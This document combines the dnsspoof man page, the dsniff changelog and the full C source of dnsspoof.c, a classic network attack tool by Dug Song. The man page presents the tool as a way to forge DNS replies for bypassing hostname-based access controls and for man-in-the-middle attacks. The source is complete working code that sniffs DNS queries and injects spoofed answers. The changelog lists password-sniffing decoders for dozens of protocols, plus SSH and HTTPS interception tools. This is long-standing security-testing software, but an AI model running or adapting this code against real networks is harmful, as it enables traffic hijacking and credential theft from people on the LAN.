dnsspoof.8
.TH DNSSPOOF 8
.ad
.fi
.SH NAME
dnsspoof
\-
forge replies to DNS address / pointer queries
.SH SYNOPSIS
.na
.nf
.fi
\fBdnsspoof\fR [\fB-i \fIinterface\fR] [\fB-f \fIhostsfile\fR] 
[\fIexpression\fR]
.SH DESCRIPTION
.ad
.fi
\fBdnsspoof\fR forges replies to arbitrary DNS address / pointer queries
on the LAN. This is useful in bypassing hostname-based access controls,
or in implementing a variety of man-in-the-middle attacks.
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to use.
.IP "\fB-f \fIhostsfile\fR"
Specify the pathname of a file in hosts(5) format. Only one hostname
allowed per line (no aliases), although hostnames may contain
wildcards (such as \fI*.doubleclick.net\fR).
.IP "\fIexpression\fR"
Specify a tcpdump(8) filter expression to select traffic to sniff.
.LP
If no \fIhostsfile\fR is specified, replies will be forged for all
address queries on the LAN with an answer of the local machine's IP
address.
.SH FILES
.IP \fI/usr/share/dsniff/dnsspoof.hosts\fR
Sample hosts file.
.SH "SEE ALSO"
dsniff(8), hosts(5)
.SH AUTHOR
.na
.nf
Dug Song <dugsong@monkey.org>


CHANGES
$Id: CHANGES,v 1.56 2001/03/19 06:53:47 dugsong Exp $

- Add support for ICMP frag-needed to tcpnice.

- New sshow program:
  http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt

- Add support for HTTP absolute URIs to webmitm and urlsnarf.

- Add support for non-transparent proxying to webmitm, as requested
  by Juergen Schmidt <ju@ct.heise.de>.

- Fix TDS decode for MSSQL 7.x, from Paul van Maaren
  <P.v.Maaren@reseau.nl>.

- Kludge around stupid Redhat Linux 6, 7 build env inconsistencies.

- Fix dumb endianness bug in dnsspoof.


v2.3 Sun Dec 17 11:35:38 EST 2000

- Add VRRP parsing to dsniff, from Eric Jackson <shinobi@monkey.org>.

- Require pcap filter argument for tcpkill, tcpnice.

- Add Microsoft PPTP MS-CHAP (v1, v2) parsing to dsniff, based on
  anger.c by Aleph One <aleph1@securityfocus.com>.

- Fix pcAnywhere 7, 9.x parsing in dsniff.

- Add -t trigger[,...] flag to dsniff, to specify individual triggers
  on the command line.

- Convert most everything to use new buf interface.

- New programs: dnsspoof, msgsnarf, sshmitm, webmitm.

- Fix inverted regex matching in *snarf programs.

- Consistent arpspoof, macof, tcpnice, tcpkill output.

- Rename arpredirect to arpspoof (maintain consistent *sniff, *snarf,
  *spoof, *spy nomenclature).

- Consistent pcap filter argument to dsniff, *snarf programs.

- Add trigger for Checkpoint Firewall-1 Session Authentication Agent
  (261/tcp), as suggested by Joe Segreti <seg@clark.net>.

- Add SMTP parsing to dsniff, as requested by Denis Ducamp
  <Denis.Ducamp@hsc.fr>.

- Add rexec and RPC ypserv parsing to dsniff, as requested by 
  Oliver Friedrichs <of@securityfocus.com>.

- Add HTTP proxy auth parsing back to dsniff, it got lost in the
  shuffle. Reported by Denis Ducamp <Denis.Ducamp@hsc.fr>.

- Add NNTPv2 and other AUTHINFO extensions to dsniff.


v2.2 Wed Jun 14 00:58:37 EDT 2000

- Rewrite HTTP decoding in dsniff, adding support for QUERY_STRING and
  x-www-form-urlencoded parsing (various CGI authentication schemes).
  
- Alpha support (libnids and libnet still need to be fixed).

- Fix arp discovery in arpredirect on Linux.

- Add -m flag to enable automatic protocol detection in dsniff,
  based on the classic file(1) command by Ian Darwin.

- Add TDS (Sybase, Microsoft SQL Server) parsing to dsniff.

- Clean up RPC decodes, TCP half-duplex reassembly in dsniff.

- New filesnarf program.

- Add regular expression matching to mailsnarf.

- Add POP support to mailsnarf.


v2.1 Thu May 18 16:18:35 EDT 2000

- Add -c flag to specify half-duplex TCP stream reassembly in dsniff
  (better support for sniffing off switched ports using arpredirect).

- Fix > 24 char Meeting Maker passwd parsing in dsniff.

- Fix OSPF parsing in dsniff (don't truncate first two chars),
  as reported by Felix Contreras <cfelix@fisiologia.com>.

- Fix webspy URL ignoring, as reported by Interrupt <mike@eEye.com>.


v2.0 Tue May 16 13:11:22 EDT 2000

- Major dsniff rewrite, since ppl are actually reading this code. :-)

- Add configurable decode triggers to dsniff.

- Add dsniff debugging functions, split out decode routines.

- Add yppasswd parsing to dsniff.

- Rewrite dsniff RPC framework, portmap and NFS mountd decodes.

- Make dsniff savefile format portable.

- Remove findgw - to be subsumed by dsquat package.

- Add PostgreSQL parsing to dsniff.

- Add Meeting Maker parsing to dsniff.

- Add poppass parsing to dsniff.

- Add RIP, OSPF parsing to dsniff.

- Fix RSET handling in mailsnarf (from Martin Fredriksson <martin@crt.se>).


v1.8 Sun Apr  9 23:59:46 EDT 2000

- Add SOCKS parsing to dsniff.

- Add pcAnywhere parsing to dsniff.

- Fix SMB parsing in dsniff.

- Add IRC parsing to dsniff.

- Add NAI Sniffer parsing to dsniff (from Anonymous).


v1.7 Mon Mar 27 16:19:32 EST 2000

- Add -s flag to specify snaplen to dsniff.

- Support systems without <libgen.h> or dirname().

- Add Microsoft SMB parsing to dsniff.

- Add Citrix ICA parsing to dsniff.

- Add LDAP parsing to dsniff.

- Fix Berkeley mbox format again (\n, not \r\n).

- Fix null URI dereference in urlsnarf.

- Add Oracle SQL*Net (v2, Net8) parsing to dsniff.

- Catch data left on connection close in mailsnarf, urlsnarf, webspy.


v1.6 Sun Mar 12 16:25:09 EST 2000

- Support non-glibc Linux systems missing ether_ntoa().

- Unique HTTP auth info by URI dirname in dsniff.

- Add Napster parsing to dsniff.

- Don't rely on /etc/services for dsniff.

- Add AIM, ICQ (v2, v5) parsing to dsniff.

- Add CVS pserver parsing to dsniff.

- Skip IMAP command tag in dsniff.


v1.5 Tue Feb 15 23:22:25 EST 2000

- Fix HTTP proxy support in urlsnarf (from <felix@convergence.de>).

- Fix HTTP proxy support in dsniff (from <Alain.Thivillon@hsc.fr>).

- Proper manpages for all programs.

- Strip binary nulls in telnet input, in dsniff (doh!).


v1.4 Thu Jan 27 12:08:41 EST 2000

- Add verbose flag (-v) to tcpkill, tcpnice.

- Add NNTP parsing to dsniff (from Felix von Leitner <felix@convergence.de>).

- Fix mailsniff mbox formatting of ^From in message body.

- Add HTTP proxy support in dsniff, urlsnarf, webspy.

- Fix getopt() usage to be POSIX compliant (s/EOF/-1/).

- New tcpnice program.


v1.3 Fri Jan 21 02:47:37 EST 2000

- Ported to Solaris (along with libnids :-)

- Add Berkeley db(3) output file format to dsniff, as well as
  restricting logging to unique auth info.

- New tcpkill program.

- New lame dsniff(8) manpage.

- Add DNS lookups (and -n flag to disable) in dsniff, urlsnarf.

- Add HTTP Basic Authentication, Referer, User-Agent logging to urlsnarf.

- Improve RPC message parsing in dsniff.

- Improve SMTP parsing in mailsnarf.

- Improve HTTP 1.x parsing in dsniff, urlsnarf, webspy.

- Fix IMAP, Rlogin, Telnet option parsing in dsniff (broke them in 1.2).

- Add X11 MIT-MAGIC-COOKIE parsing to dsniff.

- Don't forget to decode POP SASL username in dsniff (doh!).


v1.2 Sat Jan  8 22:36:42 EST 2000

- Ported to FreeBSD (but not tested!).

- Add GNU autoconf support.


dnsspoof.c
/*
 * dnsspoof.c
 *
 * Forge replies to arbitrary DNS A / PTR queries on the LAN.
 *
 * Copyright (c) 2000 Dug Song <dugsong@monkey.org>
 *
 * $Id: dnsspoof.c,v 1.10 2001/03/15 08:33:03 dugsong Exp $
 */

#include "config.h"

#include <sys/param.h>
#include <sys/types.h>
#include <sys/queue.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#ifdef __APPLE__
#include <arpa/nameser_compat.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <strlcpy.h>
#include <resolv.h>
#include <err.h>
#include <libnet.h>
#include <pcap.h>

#include "pcaputil.h"
#include "version.h"

struct dnsent {
	char		*name;
	in_addr_t	 ip;
	SLIST_ENTRY(dnsent) next;
};

SLIST_HEAD(, dnsent) dns_entries;

pcap_t		*pcap_pd = NULL;
int		 pcap_off = -1;
libnet_t	*l;
u_long		 lnet_ip = -1;

static void
usage(void)
{
	fprintf(stderr, "Version: " VERSION "\n"
		"Usage: dnsspoof [-i interface] [-f hostsfile] [expression]\n");
	exit(1);
}

/* Pattern matching code from OpenSSH. */
static int
match_pattern(const char *s, const char *pattern)
{
	for (;;) {
		if (!*pattern) return (!*s);
		
		if (*pattern == '*') {
			pattern++;
			
			if (!*pattern) return (1);
			
			if (*pattern != '?' && *pattern != '*') {
				for (; *s; s++) {
					if (*s == *pattern &&
					    match_pattern(s + 1, pattern + 1))
						return (1);
				}
				return (0);
			}
			for (; *s; s++) {
				if (match_pattern(s, pattern))
					return (1);
			}
			return (0);
		}
		if (!*s) return (0);
		
		if (*pattern != '?' && *pattern != *s)
			return (0);
		
		s++;
		pattern++;
	}
	/* NOTREACHED */
}

static void
dns_init(char *dev, char *filename)
{
	FILE *f;
	libnet_t *l;
	char libnet_ebuf[LIBNET_ERRBUF_SIZE];
	struct dnsent *de;
	char *ip, *name, buf[1024];

	if ((l = libnet_init(LIBNET_LINK, dev, libnet_ebuf)) == NULL)
		errx(1, "%s", libnet_ebuf);
	
	if ((lnet_ip = libnet_get_ipaddr4(l)) == -1)
		errx(1, "%s", libnet_geterror(l));

	libnet_destroy(l);

	SLIST_INIT(&dns_entries);
	
	if (filename != NULL) {
		if ((f = fopen(filename, "r")) == NULL)
			err(1, "fopen");
		
		while (fgets(buf, sizeof(buf), f) != NULL) {
			if (buf[0] == '#' || buf[0] == '\n')
				continue;
			
			if ((ip = strtok(buf, "\t ")) == NULL ||
			    (name = strtok(NULL, "\n\t ")) == NULL)
				continue;
			
			if ((de = malloc(sizeof(*de))) == NULL)
				err(1, "malloc");
			
			if ((de->ip = inet_addr(ip)) == INADDR_ANY ||
			    (de->name = strdup(name)) == NULL)
				errx(1, "invalid entry");
			
			SLIST_INSERT_HEAD (&dns_entries, de, next);
		}
		fclose(f);
	}
	else {
		if ((de = malloc(sizeof(*de))) == NULL)
			err(1, "malloc");
		
		de->ip = lnet_ip;
		de->name = "*";
		
		SLIST_INSERT_HEAD (&dns_entries, de, next);
	}
}

static in_addr_t
dns_lookup_a(const char *name)
{
	struct dnsent *de;
	
	SLIST_FOREACH(de, &dns_entries, next) {
		if (match_pattern(name, de->name))
			return (de->ip);
	}
	return (-1);
}

static char *
dns_lookup_ptr(const char *name)
{
	struct dnsent *de;
	int a0, a1, a2, a3;
	in_addr_t dst;
	char *a;

	if (strchr(name, '%') != NULL)
		return (NULL);

	if (sscanf(name, "%d.%d.%d.%d.", &a3, &a2, &a1, &a0) != 4)
		return (NULL);

	a = (char *)&dst;

	a[0] = a0 & 0xff; a[1] = a1 & 0xff; a[2] = a2 & 0xff; a[3] = a3 & 0xff;
	
	SLIST_FOREACH(de, &dns_entries, next) {
		if (de->ip == dst && strchr(de->name, '*') == NULL)
			return (de->name);
	}
	return (NULL);
}

static void
dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
	struct libnet_ipv4_hdr *ip;
	struct libnet_udp_hdr *udp;
	HEADER *dns;
	char name[MAXHOSTNAMELEN];
	u_char *p, *q, *end, buf[1024];
	int i, anslen, dnslen;
	in_addr_t dst;
	u_short type, class;

	ip = (struct libnet_ipv4_hdr *)(pkt + pcap_off);
	udp = (struct libnet_udp_hdr *)(pkt + pcap_off + (ip->ip_hl * 4));
	dns = (HEADER *)(udp + 1);
	p = (u_char *)(dns + 1);
	end = (u_char *)pkt + pkthdr->caplen;

	if ((dnslen = end - (u_char *)dns) < sizeof(*dns))
		return;

	if (dns->opcode != QUERY || ntohs(dns->qdcount) != 1 ||
	    dns->ancount || dns->nscount || dns->arcount)
		return;

	if ((i = dn_expand((u_char *)dns, end, p, name, sizeof(name))) < 0)
		return;

	p += i;
	GETSHORT(type, p);
	GETSHORT(class, p);

	if (class != C_IN)
		return;

	p = buf + dnslen;
	
	if (type == T_A) {
		if ((dst = dns_lookup_a(name)) == -1)
			return;
		/* XXX - cheat on alignment. */
		memcpy(p, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04",
		       12);
		memcpy(p + 12, &dst, sizeof(dst));
		anslen = 16;
	}
	else if (type == T_PTR) {
		if ((q = dns_lookup_ptr(name)) == NULL)
			return;
		/* XXX - cheat on alignment. */
		memcpy(p, "\xc0\x0c\x00\x0c\x00\x01\x00\x00\x00\x3c", 10);
		anslen = dn_comp(q, p + 12, 256, NULL, NULL);
		p += 10;
		PUTSHORT(anslen, p);
		anslen += 12;
	}
	else return;

	memcpy(buf, (u_char *)dns, dnslen);

	dns = (HEADER *)buf;
	dns->qr = dns->ra = 1;
	if (type == T_PTR) dns->aa = 1;
	dns->ancount = htons(1);

	dnslen += anslen;

	libnet_clear_packet(l);
	libnet_build_udp(ntohs(udp->uh_dport), ntohs(udp->uh_sport),
			 LIBNET_UDP_H + dnslen, 0,
			 (u_int8_t *)buf, dnslen, l, 0);

	libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_UDP_H + dnslen, 0,
			  libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_UDP, 0,
			  ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, l, 0);
	
	if (libnet_write(l) < 0)
		warn("write");

	fprintf(stderr, "%s.%d > %s.%d:  %d+ %s? %s\n",
	      libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(udp->uh_sport),
	      libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(udp->uh_dport),
	      ntohs(dns->id), type == T_A ? "A" : "PTR", name);
}

static void
cleanup(int sig)
{
	libnet_destroy(l);
	pcap_close(pcap_pd);
	exit(0);
}

int
main(int argc, char *argv[])
{
	extern char *optarg;
	extern int optind;
	char *p, *dev, *hosts, buf[1024];
	char ebuf[LIBNET_ERRBUF_SIZE];
	int i;

	dev = hosts = NULL;
	
	while ((i = getopt(argc, argv, "i:f:h?")) != -1) {
		switch (i) {
		case 'i':
			dev = optarg;
			break;
		case 'f':
			hosts = optarg;
			break;
		default:
			usage();
			break;
		}
	}
	argc -= optind;
	argv += optind;

	if (dev == NULL && (dev = pcap_lookupdev(buf)) == NULL)
		errx(1, "%s", buf);
	
	dns_init(dev, hosts);
	
	if (argc > 0) {
		p = copy_argv(argv);
		strlcpy(buf, p, sizeof(buf));
	}
	else snprintf(buf, sizeof(buf), "udp dst port 53 and not src %s",
		      libnet_addr2name4(lnet_ip, LIBNET_DONT_RESOLVE));
	
	if ((pcap_pd = pcap_init(dev, buf, 128)) == NULL)
		errx(1, "couldn't initialize sniffing");

	if ((pcap_off = pcap_dloff(pcap_pd)) < 0)
		errx(1, "couldn't determine link layer offset");
	
	if ((l = libnet_init(LIBNET_RAW4, dev, ebuf)) == NULL)
		errx(1, "couldn't initialize sending");
	
	libnet_seed_prand(l);
	
	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);

	warnx("listening on %s [%s]", dev, buf);
	
	pcap_loop(pcap_pd, -1, dns_spoof, NULL);
	
	/* NOTREACHED */
	
	exit(0);
}
